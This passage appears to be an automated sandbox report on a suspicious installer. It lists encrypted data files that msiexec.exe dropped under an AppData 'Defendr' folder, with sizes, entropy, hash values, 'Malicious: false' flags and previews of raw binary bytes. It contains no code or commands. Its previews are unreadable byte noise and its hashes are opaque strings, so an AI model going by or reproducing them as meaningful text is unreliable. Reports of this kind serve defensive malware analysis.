Preview:	.#D...e..,...!G...A..Z\.Zs..s.....n...H.n..]...f..7Y...y+.....e.'...v).....5..'.{.?.K...+E.u........f/. \....$..@.......O.4..5......V..j&....A..I..Qx..Q..u...v.....4...k.B."=..}A....... \|^bU-._.4z..D.8......Q..wk....e....i..D.:COK..}'\|@...a!rr..I..=P....Y...A+k..........Y...5...%Dk.ch+X.._.\|rU..P.`....LU7(0=..A.:....{.8.kJ.;.~.p...]]....2....R.'..b.;6}7r....q......\|.../.9..k.u..!s....u....6.....v....o`.l.8........wJ:H.a`..hG./......?...}..#Q[.s..x.`. .(.M...B...:...^.z2.Oki....J.=r.....%....L1....m6.d....r...a.y..s.O......n...4..\|Uf......Q.k..9.,...4...J.n.j.......w.....sM.MCGNg....~....ZFM.K..U...}o....DF..Z.aI.`e.V}............0?.l.....>l.(....N...\|.O.{.H..7....}#Rr.A(vie.......o...y.,...xlG`...=...f.Xw.c..[8%.<..cF.aa7.....4....8:......6#.B.(..9^..g...S....).".....W....6.^.f....#......v..1;.ha,...>.5!1.7ruW0...._.>.N...$E..$..\|..+...'.)C>...KS...'..).!.k...'.....y.:..s...D. +CF.dz.,7vS.7....7.M-.....L.`....d<6.......,..H.u

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv19.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100400
Entropy (8bit):	7.998110943531547
Encrypted:	true
SSDEEP:	1536:BW62nhG8AQQBT53JFN+5TpbPZVBGhxZi1Ka1UxtunyibE/A7H+RyMtcNltuFTJ5N:oFyQQFJFA5TFAu9nyizaRbtcNl2uo
MD5:	D0EA1D0ABDB8F217D26A0CC27116268C
SHA1:	74F9A8FDCD8A5279C6458A37B75C38A09A4C921B
SHA-256:	DC51F45745036F0A6F9F902BDC57412B928DB386BF0393497DEDF53D183833E2
SHA-512:	6555BE4B95F5C175527209C7C570E72A84EADE8484ADD399A1BE63EB3E80963DFF5EB72DFFFA33FEFC1946AAD340DD0E45DC63F793BE5FCC1F51A1B5757CC819
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv19.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	40466
Entropy (8bit):	7.995475681302088
Encrypted:	true
SSDEEP:	768:BW6Ng6eiZHToV4q3BzoK6hMB2gFuDkVk/xacKtpoLvzp5VTspL3hF/CnV7:BW6OvWToVT3BE1S0gQkgTKtp2v9n2B6
MD5:	F71B653B55720C08816297D442F005FF
SHA1:	EC97519842F03D1A7834565DFFE1A0A795FF03FE
SHA-256:	547CEE01D9AC02641550287145E9A8B33FAA10CF9D26EA53432924F0804EC4B0
SHA-512:	3CB0C4903C27F713FFFDE1B185895DF1DEA8EB7D1B34F87472F855B5AD6976333702CEA220793EDC7B25782BE872C5659AF5AB4974E1636BCD7D5BD734216DBB
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv2.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	98733
Entropy (8bit):	7.9984000423576855
Encrypted:	true
SSDEEP:	3072:oEHFcD+q5L9vgXaQc+DUY1yRibb3gw7+BJP:bFcKo9vgKf+DUYwRAjgw7+BR
MD5:	7AFF247D52FE6468A6E06E206616A83D
SHA1:	0965687E40619574263356EC26AB66DB93334A06
SHA-256:	67D33D3FF9384867E6175C75EF916F01EBF68DDD3C463371A537678866196690
SHA-512:	BCFE14A7C0C94CD30D62E3C8DED0A85E1AFF9062B0BD1CF9415E2673DC054B931FF7837387920C7F3CAF884721F967272534CC652BBAD41080C5517621F90CE2
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv2.2.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	78854
Entropy (8bit):	7.997783115871903
Encrypted:	true
SSDEEP:	1536:BW6NHF4xDpEHRBOuTsLQ4vXQKe5WQtNuTu7fM01vlPs1VQ5SKgK3xqxoYIMiALtG:oEHFcD+q5L9vgXWQCu7fBvmBKgK3xJ2E
MD5:	43CB62B23805F38DF000C7B9D0227402
SHA1:	00CFC3FB4D1292E824A76563E81078D2894B928B
SHA-256:	C5AD8B348F0C81F93FC6C5573FC6252E5D1F6FAC2A9810834B0222C41175CF0D
SHA-512:	8A04FA349BF29D2571915494DAD697DA2C55812A1A2BB4D38FEED36659E1809E5BC84F328CC857A12E15B3110327A3E264F236F7AA132345629F482307579F79
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv2.3.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	78869
Entropy (8bit):	7.997741561782965
Encrypted:	true
SSDEEP:	1536:BW6NHF4xDpEHRBOuTsLQ4vXQKe5iSzOyXAOV23EiYqZSQWvBOgdXySw4SUGyyW1X:oEHFcD+q5L9vgXiuAArpqpWQgO4SUhy0
MD5:	306A37CCC16E48CD582D0AA8E2643C6B
SHA1:	1DA98DA8E420081FC1C66737F42C4DBFE679DE65
SHA-256:	875CEC1FC380D90F8E4F0405A35AD8B370F30B3C4FCEC33150CF31D7EE650EA6
SHA-512:	FFD0EFDB82DE109715A1965B511FA92D3755AEB79BC0400A9DE7E3B175DB554F699F63F53A2F6F1D50431B9C1782238F1FE3AB78F7F2285C71480521154A28E9
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv2.4.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	62087
Entropy (8bit):	7.997256717321158
Encrypted:	true
SSDEEP:	1536:BW6L7jPEVdlmZuDSjp6r2mb79JEfwf6I0kZ0calY:o07jPqQeSjUrfJZ0calY
MD5:	068530597136C000D573D2CBF07DCA45
SHA1:	2D80345B8550146498393A3DC533EE8EF21D48B0
SHA-256:	D122CAB4C0DD68F062F3ECA1831521456916655D90AD728CF37E9BC2E18B0B1F
SHA-512:	314631DF622F5F104FA0325F7F4CA3246E9013489B12A15302A224F2D026077AC3C48C2B3E770EEB232841CAE01E92E1527DCBBBB89D1AD69A06885E869F58D9
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv2.5.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	70895
Entropy (8bit):	7.9976539954309205
Encrypted:	true
SSDEEP:	1536:BW6NHF4xDpEHRBOuTsLQ4vXQKe56b/H854Ys+9T1OM4FXNB+xwVvhzSmLhEPbOke:oEHFcD+q5L9vgXFKmT+zEK1zhEPC24
MD5:	62BD966FFC5049BF7EB18A93FCA491B0
SHA1:	3C4BB0234E229219E5F346A2007082F780BE1C0D
SHA-256:	14CA1F80674F606C54925B3B6862C7751BCD75B0C15C22002E954B0D33ED0F85
SHA-512:	CA1AE12DF982CBC242237A0BA50DD21A16A24281745DE9AEF0B2CE8E92179119CA38605FA26B2559C1055CA18E2577A073A2FCF9F5D5CE733778569EB91F9271
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv2.6.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	31651
Entropy (8bit):	7.994928165465702
Encrypted:	true
SSDEEP:	768:BW6NuYrJzFZdFjqpB/yTzryiNGB7S44Gork1d+34PMO9GTgr:BW6gYrJroyvNiz4GoY1db9e6
MD5:	D5A0EC5D290F02C4D03068DD57ECF672
SHA1:	4243FB0146728E2D5566ED7D771156DCE1A2FCA3
SHA-256:	6DF1BC6AB82B91079D9372B28E30CBCFDCB0168A36480A47BE76C73F3F49FAF7
SHA-512:	9D383AB71F87FC155E57DB2BD23C6EAADE5EBA87E0684CA9DEF92F6CDA46F29E306FFDC597C84780A4CE48D82207AABE7C4584CE9A357E5D24F33BBAD44C7162
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv20.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	58143
Entropy (8bit):	7.996907279683717
Encrypted:	true
SSDEEP:	1536:BW68TO2X/i2z79oufxd9UELdfqShtnwjpMR7h34ZsG7c:orTOI/Tf9ouZde+/76pJD7c
MD5:	24B707FD8F1EA5BE94980DB03F9A4974
SHA1:	8A43A69E524AA1C3DFCDB9733B6F24FBF494A983
SHA-256:	D40D84E9BF8832D4E07C6F20B94E3C65779F5676250AB5CA2339B3DCBF0EC84D
SHA-512:	0811F17839C30C6E375D29A41D1B0F973A988F73D0E3433C70E96D71210E98EAED82AB0FFB9932F804F946F322F3EF05BB97B3A345BCB80648906F61C675ECEF
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv20.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	36741
Entropy (8bit):	7.99573234379355
Encrypted:	true
SSDEEP:	768:BW6NdIsjO+mlsN5Eju86k+lC3KI1T2xshPQZpjmz6+psQtHml:BW68/lsNCjuT5MKI1K+BY06Oel
MD5:	C4A315EC291DE2F3F060B1EFF06F822C
SHA1:	0AC931648653F07C6853E0BA0DA03369AF79B228
SHA-256:	5514E5CDA485D604D5D175050276EB54BC537AC3EDBB7FA9BE6BDF14922F995A
SHA-512:	CEB7EB6FC34073C090C4DB6B3AAEAD2A52BCC8339903B7EA9458B65E63B77B002734E10270C2140DE9813C98CE7F7F7D5738BEAD2047D603934A5FBE130CCC1A
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv21.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	99457
Entropy (8bit):	7.998216605387722
Encrypted:	true
SSDEEP:	3072:oevBHKusW1xg1krVLPOuzHUg28+U9NdaXUHro:bBHKusMW1tujUrUXdaXUHE
MD5:	8BACDD58461F723850227630FEA68F61
SHA1:	33C75A0B8BD260F260090ABF8F25BF94A11ADA73
SHA-256:	79DF17693D9C2475D709983ABE3B900E751BD1E58964EE34BBE8EA916FA07CBB
SHA-512:	69D1D1E4563A8DE7E597249F5490517807A89CBA0E72AB07C70A75800A41CDF5B54923E0C0FAB27CCEBEA3B20999C09A0E0BEDD40218473E8C07D637EADEB5D8
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv21.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32168
Entropy (8bit):	7.994435253905921
Encrypted:	true
SSDEEP:	768:BW6NE6olB/BmXzITGVePTRquaTG1vjNFKaVtKJWs08:BW6+RmD8rrjKqtKJWsx
MD5:	6C692AE84BE3FE987C5FC52FD5AEB9B1
SHA1:	FA422785D76A48DA99F731A0DB17478D7D142824
SHA-256:	16CFB08F9CC69C1ACDCE702214720F818686CFA9A42F3FF05526694564FFB431
SHA-512:	8D9C011936519483B04D6D1336D9BEA2272633BD550BF0DDB6033D06635EBF19DBA581D9FA8455A41BFA5DFC53D0171BFF7B692EC3750C21EF50D4C1F50B5A7C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv22.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100759
Entropy (8bit):	7.998386882859617
Encrypted:	true
SSDEEP:	1536:BW60OQKK6Rq8xEwZUzfHcm2bcKctvSRPCA0a9YdoB01M6mIRY59SkT8WNSQfUmfT:oJ8RqLrOwFdG/aeB01yIRIjoWgkVb
MD5:	A93213451F57225C3051FDC3A9A54D33
SHA1:	26642DDC5DEFDA68EE2E9C9048718FD09300A004
SHA-256:	685DD381523288E76ABE931E340D79A9A79AC66A0CFD1B320AB4273B856401E1
SHA-512:	E44E074ABED6EB5263BFC43A0DF6A9CD1738AB6B1D1A9E47157A32CE951C6BF5153FA3F253C1A7900FECA1F398F4C78A93B3D143E9CA2A243C88B2F0F566F8CD
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv22.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	40041
Entropy (8bit):	7.995642545194862
Encrypted:	true
SSDEEP:	768:BW6NnnkxCV72G3/1QpBiVDe0q6v3NcQd8DHGIL2Zak50f8r7ix:BW6xqa/2B+ev6vS9SbakeL
MD5:	6B13FB595DF0775BD7DAB5C4EF1CF33F
SHA1:	87695667DEBEDEA6F532DE90211A139E43061DBB
SHA-256:	DF4BBEAF14D89508FCBFA0E5CC50513B07230AC9956F9B2EA0B03A815DDA6B3B
SHA-512:	1CF8B936012CE8B810109D0B346574BF7CE2B39554D2961DEB82B7AF0A4BCCACE3E88CFDFFAFFCDD75B2B58524B17CD8A9D865048ADA0A739F57EECDE61978E5
Malicious:	false
